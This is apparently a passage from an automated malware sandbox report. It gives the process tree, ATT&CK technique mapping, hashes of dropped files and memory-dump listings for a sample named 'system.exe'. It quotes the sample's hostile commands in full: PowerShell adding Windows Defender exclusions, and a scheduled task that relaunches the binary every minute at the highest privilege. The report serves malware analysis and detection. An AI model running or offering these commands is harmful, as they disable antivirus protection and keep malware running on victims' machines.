        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\system.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3496
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system" /tr "C:\Users\Admin\system.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4764
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /7
  2⤵
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4592

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4752

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4084

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:3652

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\system.exe.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

Filesize
14KB

MD5
bcb66ef5c452f3569b0f0d44fa0b5b97

SHA1
4dda831346b2e69f7d05556846d825bd03c273f3

SHA256
fb092e52d2d276ad2aea3c86fb4ae4b29b6524de6a8fd5d2adea7e67ef7badab

SHA512
a096f4831792cd78cb0e1099d1cdacbfb795b8b7c0fe48776d5acb97aa0a1aeac7eb350f1f3deb5cac973f7cca86ebb6a4a117a518b5be7d309ca723597f5540

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
50KB

MD5
2143b379fed61ab5450bab1a751798ce

SHA1
32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e

SHA256
a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81

SHA512
0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
aeb24b5729d62e81a27174f46d431126

SHA1
baa02ac3f99822d1915bac666450dc20727494bb

SHA256
d2b2e09bffd835255b1fb57c2aa92e5c28c080eb033e1f042087d36a93393471

SHA512
e62f6771339326a90f03b79f8a3321c4f00d66e5f228055f17b75d028895f80ce374bd0143ec971f55efa861b949ec672bfda9df7fb45444b17f3dbe479a5415

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
74e6c210ea6f28fbd667575ecc8fa87e

SHA1
85cd9d8c92df744be53c98440fddf27d031d21ef

SHA256
bf8f5eeb8013ed2164a4c66ee2f9933de5e1e765362547f7392b2df14b9639fd

SHA512
b3bbe944e8569e77792128a13435520ccd455ba9e2cbeff821b62677afbd553c28bde598b14553d07ea6d06d517b105ad822287bbd328b039cc1374177c29c98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7df2f6d0f541df8c1f141aff1eb2f017

SHA1
70eafd969bb5ef50b18dd831a52c7834869a3c72

SHA256
cf15f9fa9fd29ba3739add33beff7b2cf9176ab3e4d7fbb70b8cd6a949ca9a13

SHA512
be460111ca178cea6fa35ead9a04935efaba83681bfc46ca8962804aa4773a632624dc5f45e7b22454102428139a88c3f19b634adab58181466ec97b1e8c4e34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d04f808525e7bcd4950d5529a73aeb0e

SHA1
f0db9ad1497f8cfe66b79fba937efb08e771510c

SHA256
c13b8f847787459cfe64f6238a4ba94157554c757bde82936c89737bfa38c97d

SHA512
ecd26630674b7898ddba85f0cca9c8f8841b1df3a4c839e907b96dddc8513cfcb2614f8d20738d7129ea238734ad73803c2baef05ea8a50654b7d96e0124266e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d123f177a80dea4891c7dd8547f27e98

SHA1
541b62bf367fd01e7d034334235d656a8b893c4f

SHA256
5480e1c65aeee7684fda37e101b7a407bcf7aa31151a1d5668c1649eeb07a332

SHA512
6087510588f77e57082578d805f1c2ec0c4a7a857cd876a495599fbc2c7d80f515588b6cb1600dc5f49ce066a764423b58f770432e0ce1486da91cae7593ccc5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
24ecaf8649da264e4272ac1bbe689417

SHA1
e86511905d7ee22b766f583d85ec7334ce1428fd

SHA256
a3b5322adf9b3c8dca365400b2e29e8f011d9a105e6616dacd69392e2f841d44

SHA512
cb3244599b6163cf6adad161c9190911201dd7d62663ae9284f5b5618fbff2615627da4d5e5f0b0f66cc61ee1bd639a5ff1d28be72aedb16a0382148b304e407

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i2dxghop.ct1.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_464.bat

Filesize
410KB

MD5
d87efb4cf8da07e1956944f23313bb5b

SHA1
929203873eaf41e02377a26e1ef4db8a88d37696

SHA256
f3d0b86b5b93ff36ccb01f326eae7b612a3016c6d570478de2211d01d2e39cbd

SHA512
d726064d2833f4ee4a52dc85515f6dd471e72acd53d2576916313a0aaa224e199ba56cdf6fbd5fe4b21be62ab38779adc1b977b333971f160ac8cf3e26ba952a

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_464.vbs

Filesize
124B

MD5
4b4fb764f8767f908faebbafb72b35a2

SHA1
3c0d570710e2bffe497654c44ece3817676a9f9d

SHA256
da23ceff5bcfa2a6f300404c2220710885177630f5ac9b0e527fbf288a91f777

SHA512
adfde57e9cd8206b3fbe1cb83f1a95d77acd6ea7f7a59359ef965143be6a4b52b867d6c16f2c3aa53b1dad74ccb622347a43cfeab28cc3a5ea6d81ff745f8154

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk

Filesize
775B

MD5
d38e224e2c08d7b8e64e453ec635938f

SHA1
1f743c87f0b19ec812e9598b9d609320a15caa1e

SHA256
fcef1a29a9c837ffc98404b3fa09492d28c03efa9ae9c00e1d3de5f1bc43bb27

SHA512
d94d57b1225a5c05a7b14a813660981985405a49bd0c1efeef6e913bea83b4e17e239d6b7f51dc1b0e9e004049fe0c796007cfb45b7e965bdef92d10744347d9

Download Submit
C:\Users\Admin\system.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
memory/360-229-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/696-224-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/724-235-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/1028-240-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/1092-238-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/1212-241-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/1300-234-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/1364-223-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/1428-529-0x000001F065310000-0x000001F06531C000-memory.dmp

Filesize
48KB

Download
memory/1428-176-0x000001F0653A0000-0x000001F0653BA000-memory.dmp

Filesize
104KB

Download
memory/1484-237-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/1564-231-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/1624-227-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/1692-236-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/1752-230-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/1760-222-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/1892-233-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/2224-239-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/2264-226-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/2340-225-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/2692-232-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/2988-57-0x00007FFEFE880000-0x00007FFEFF26C000-memory.dmp

Filesize
9.9MB

Download
memory/2988-58-0x0000028A9E420000-0x0000028A9E428000-memory.dmp

Filesize
32KB

Download
memory/2988-5-0x0000028A9E3F0000-0x0000028A9E412000-memory.dmp

Filesize
136KB

Download
memory/2988-34-0x0000028A9E8E0000-0x0000028A9E91C000-memory.dmp

Filesize
240KB

Download
memory/2988-45-0x0000028A9E9A0000-0x0000028A9EA16000-memory.dmp

Filesize
472KB

Download
memory/2988-2-0x00007FFEFE883000-0x00007FFEFE884000-memory.dmp

Filesize
4KB

Download
memory/2988-46-0x00007FFEFE880000-0x00007FFEFF26C000-memory.dmp

Filesize
9.9MB

Download
memory/2988-47-0x00007FFEFE880000-0x00007FFEFF26C000-memory.dmp

Filesize
9.9MB

Download
memory/2988-59-0x0000028A9E920000-0x0000028A9E970000-memory.dmp

Filesize
320KB

Download
memory/2988-166-0x00007FFEFE880000-0x00007FFEFF26C000-memory.dmp

Filesize
9.9MB

Download
memory/3328-221-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/3328-173-0x0000000002650000-0x000000000267A000-memory.dmp

Filesize
168KB

Download
memory/4084-228-0x00007FFEDA5B0000-0x00007FFEDA5C0000-memory.dmp

Filesize
64KB

Download
memory/4680-71-0x00007FFEFE880000-0x00007FFEFF26C000-memory.dmp

Filesize
9.9MB

Download
memory/4680-72-0x00007FFEFE880000-0x00007FFEFF26C000-memory.dmp

Filesize
9.9MB

Download
memory/4680-75-0x00007FFEFE880000-0x00007FFEFF26C000-memory.dmp

Filesize
9.9MB

Download
memory/4680-105-0x00007FFEFE880000-0x00007FFEFF26C000-memory.dmp

Filesize
9.9MB

Download